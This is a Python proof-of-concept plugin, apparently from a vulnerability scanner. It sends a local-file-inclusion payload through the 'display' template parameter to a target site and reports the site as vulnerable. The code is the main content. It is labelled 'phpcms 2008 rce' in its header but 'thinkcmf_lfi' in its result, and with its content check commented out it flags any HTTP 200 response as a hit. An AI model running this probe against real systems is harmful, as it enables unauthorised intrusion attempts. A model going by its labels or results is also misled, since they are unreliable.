# Author:w8ay
# Name:phpcms 2008 rce
'''
referer: https://xz.aliyun.com/t/6626
description: 通过构造a参数的display方法，实现任意内容包含漏洞.
'''
import HackRequests

def poc(arg, **kwargs):
    payload = r'''/?a=display&templateFile=./data/install.lock'''
    hh = HackRequests.http(arg + payload)
    shell_url = arg + payload
    #r = HackRequests.http(shell_url)
    #if r.status_code == 200 and '202cb962ac59075b964b07152d234b70' in r.text():
    if hh.status_code == 200 :
        result = {
            "name": "thinkcmf_lfi",  # 插件名称
            "content": "通过构造a参数的display方法，实现任意内容包含漏洞.",
            "url": shell_url,  # 漏洞存在url
            "log": hh.log,
            "tag": "lfi"  # 漏洞标签
        }
        return result

if __name__ == "__main__":
    pass